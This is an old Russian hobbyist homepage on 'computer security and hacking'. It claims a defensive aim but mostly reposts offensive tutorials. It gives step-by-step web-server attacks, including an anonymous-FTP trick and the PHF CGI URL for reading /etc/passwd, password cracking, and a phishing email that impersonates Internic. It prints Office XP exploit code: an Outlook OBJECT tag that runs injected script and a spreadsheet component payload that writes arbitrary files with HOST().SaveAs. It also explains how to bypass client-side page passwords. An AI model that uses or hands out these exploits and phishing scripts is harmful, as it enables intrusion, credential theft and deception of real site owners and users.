Домашняя страница

Компьютерная безопасность

и взлом систем.

Я создал эту страничку не для того чтобы сделать её еще одним пособием по хакингу,

а для защиты от хакерских атак. Сам я не являюсь большим специалистом так что извините за неудобства. Если вы хотите чтобы ваша статья попала на этот сайт с ссылкой на вас, то пошлите мне эту статью мне на E-mail: Timon_timonovich@mail.ru

Как хакнуть Web

1. Получение информации

Перед тем, как хакнуть Web-страничку, тебе следует иметь кое-какую информацию. Как получить ее? Сходи на http://www.Internic.com. Скажи им, что ты хочешь создать Web-страничку. Напиши имя той странички, которую ты хочешь хакнуть, в графе, где просит ввести имя странички, которую ты хочешь создать. Оно скажет, что типа, извините, кто-то уже использует этот домен и выдает информацию об этом. Это имя, адрес и E-Mail. Теперь ты знаешь, с кем будешь работать.

2. Методы взлома. Есть несколько видов взлома.

A) Взлом через FTP. Если ты в Windows зайди в эмуляцию DOS (Сделай это, когда законектишся на твой ISP) Теперь напиши в открытом Chepuha.com (Chepuha.com = введи место, которое ты хочешь хакнуть)
После этого тебя спросят логин, нажми Enter
После этого тебя спросят пароль, нажми Enter
Потом напиши: quote user ftp
Напиши: quote cwd ~root и надми Enter
Напиши: quote pass ftp
Теперь ты в системе, напиши: cd etc и нажми Enter
Напиши: get passwd и если это не сработает, напиши get passwd.

Б) Получить файл с паролями, это гораздо легче. Через TelNet на анонимных FTP серверах, посмотри директорию и найди файл, который называется Passwd. Затем используй Cracker Jack и расшифруй все пароли. Другой путь, получить пароли с помощью твоего браузера. Напиши: cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd после имени сервера. Например, имя может быть www.hackme.com, вот и напиши: http://www.hackme.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Не уверен, что это сработает, но 10 сайтов из 100 будет работать это точно.

В) Этот метод взлома использует GBoZ. Он называется "Scoial Engeneering", что это имеется в виду, долго рассказывать :). И так, ты получаешь информацию с Internic (пункт 1). Получив пользовательский E-Mail, запусти анонимную почтовую программу и IP снифер. В аноним-проге введи почтовый адрес жертвы и пошли ему его страничку, которую ты собираешься хакнуть. Тебе следует с имитировать письмо, как InternicHost.net. Скажи жертве в письме, типа такое: "Your webpage is casuing severe errors in our server change your password to "WXZPP3" immidately thanks". СОБЛЮДАЙ ГРАММАТИКУ И ПУНКТУАЦИЮ, ЧТОБЫ ПИСЬМО ВЫГЛЯДЕЛО, КАК ОФИЦИАЛЬНОЕ!

Г) Если ты запустишь Linux или Unix, просто пропингуй выход Hackme.com (Hackme.com = место, которое ты хочешь хакнуть!)

Ok, это все долго и нудно, но я надеюсь, что это придаст желаемых результатов!

Взято с сайта Alexey.narod.ru

Обнаружено несколько уязвимостей в программах Office XP.

Данный код в Outlook XP при форварде письма или ответе

выполнит внедренный JavaScript:

<OBJECT id=WebBrowser1 height=150 width=300

classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>

<PARAM NAME="ViewID"

VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">

<PARAM NAME="Location"

VALUE="about:/dev/random<script>while (42)

alert('HOHOHO\nTrying to sell trustworthy

computing\nHOHOHO')</script>">

</OBJECT>

В новом Офисе существует табличный компонент,

минимальное подобие Excel'я. Он поддерживает функцию

Host(), при помощи вот такого оператора

'=Host().SaveAs("name")' можно создавать произвольные

файлы на компьютере пользователя (в любом месте). Таким

образом бедному юзеру можно передать любую программу и

соответственно запустить ее на выполнение.

Пример:

<h1>

Hehe. Trying to sell trustworthy computing.

</h1>

<OBJECT

classid="CLSID:0002E551-0000-0000-C000-000000000046"

id=Spreadsheet1

v:shapes="_x0000_s1026" class=shape width=81 height=81

u1:shapes="_x0000_s1025">

<param name=XMLData

value="<?xml version="1.0"?> <ss:Workbook

xmlns:o="urn:schemas-microsoft-com:office:office"

xmlns:x="urn:schemas-microsoft-com:office:excel"

xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet"

xmlns:c="urn:schemas-microsoft-com:office:component:spreadsheet"

xmlns:html="http://www.w3.org/TR/REC-html40">

<x:ExcelWorkbook>

<x:ProtectStructure>False</x:ProtectStructure>

<x:ActiveSheet>0</x:ActiveSheet> </x:ExcelWorkbook>

<ss:Styles> <ss:Style ss:ID="Default"> <ss:Alignment

ss:Horizontal="Automatic" ss:Rotate="0.0"

ss:Vertical="Bottom" ss:ReadingOrder="Context"/>

<ss:Borders> </ss:Borders> <ss:Font ss:FontName="Arial"

ss:Size="10" ss:Color="Automatic" ss:Bold="0"

ss:Italic="0" ss:Underline="None"/> <ss:Interior

ss:Color="Automatic" ss:Pattern="None"/>

<ss:NumberFormat ss:Format="General"/> <ss:Protection

ss:Protected="1"/> </ss:Style> </ss:Styles>

<c:ComponentOptions> <c:Label> <c:Caption>Microsoft

Office Spreadsheet</c:Caption> </c:Label>

<c:PreventPropBrowser/> <c:MaxHeight>80%</c:MaxHeight>

<c:MaxWidth>80%</c:MaxWidth>

<c:NextSheetNumber>1</c:NextSheetNumber>

</c:ComponentOptions> <x:WorkbookOptions>

<c:OWCVersion>10.0.0.2621 </c:OWCVersion>

<x:DisableUndo/> </x:WorkbookOptions> <ss:Worksheet

ss:Name="Sheet1"> <x:WorksheetOptions> <x:Selected/>

<x:ViewableRange>R1:R262144</x:ViewableRange>

<x:Selection>R1C1</x:Selection>

<x:TopRowVisible>0</x:TopRowVisible>

<x:LeftColumnVisible>0</x:LeftColumnVisible>

<x:ProtectContents>False</x:ProtectContents>

</x:WorksheetOptions> <c:WorksheetOptions>

</c:WorksheetOptions> <ss:Table

ss:ExpandedColumnCount="1" ss:ExpandedRowCount="1"

ss:DefaultColumnWidth="48.0"

ss:DefaultRowHeight="12.75"> <ss:Row> <ss:Cell

ss:Formula='=HOST().SaveAs("C:\GGGG5")'> <ss:Data

ss:Type="Boolean">1</ss:Data> </ss:Cell> </ss:Row>

</ss:Table> </ss:Worksheet> <ss:Worksheet

ss:Name="Sheet2"> <x:WorksheetOptions>

<x:ViewableRange>R1:R262144</x:ViewableRange>

<x:Selection>R1C1</x:Selection>

<x:TopRowVisible>0</x:TopRowVisible>

<x:LeftColumnVisible>0</x:LeftColumnVisible>

<x:ProtectContents>False</x:ProtectContents>

</x:WorksheetOptions> <c:WorksheetOptions>

</c:WorksheetOptions> </ss:Worksheet> <ss:Worksheet

ss:Name="Sheet3"> <x:WorksheetOptions>

<x:ViewableRange>R1:R262144</x:ViewableRange>

<x:Selection>R1C1</x:Selection>

<x:TopRowVisible>0</x:TopRowVisible>

<x:LeftColumnVisible>0</x:LeftColumnVisible>

<x:ProtectContents>False</x:ProtectContents>

</x:WorksheetOptions> <c:WorksheetOptions>

</c:WorksheetOptions> </ss:Worksheet>

<o:DocumentProperties> <o:Author>ad</o:Author>

<o:LastAuthor>ad</o:LastAuthor>

<o:Created>2002-03-17T12:07:37Z</o:Created>

<o:Company>g</o:Company> <o:Version>10.2625</o:Version>

</o:DocumentProperties> <o:OfficeDocumentSettings>

<o:DownloadComponents/> <o:LocationOfComponents

HRef="file:///E:\"/> </o:OfficeDocumentSettings>

</ss:Workbook> ">

</object>

Еще один взлом Web

Эта статья будет самой маленькой потому что она самая простая. Часто гуляя по

сети можно наткнуться на страницу, при входе тебе говорят, введи ка пароль,

лохан... Вот именно метод взлома таких паролей будет рассмотрен ниже в этой

статье!

Итак взломать такой пароль элементарно просто и сможет даже самый последний

ЛАМЕР! Чтобы это сделать, надо при приглашении ввести паролей нажать на Отмену и

тут же на стоп в броузере. Загрузка страницы прекратится. Теперь если твой

браузер IE, то простматриваешь страницу в виде HTML и там открытым текстом

выложен этот пароль, его только надо там поискать, но это уже просто надо глаза

вынуть из задницы и все. Дальше ты снова заходищь на страницу, вводишь пароль и

все! Танцуют все!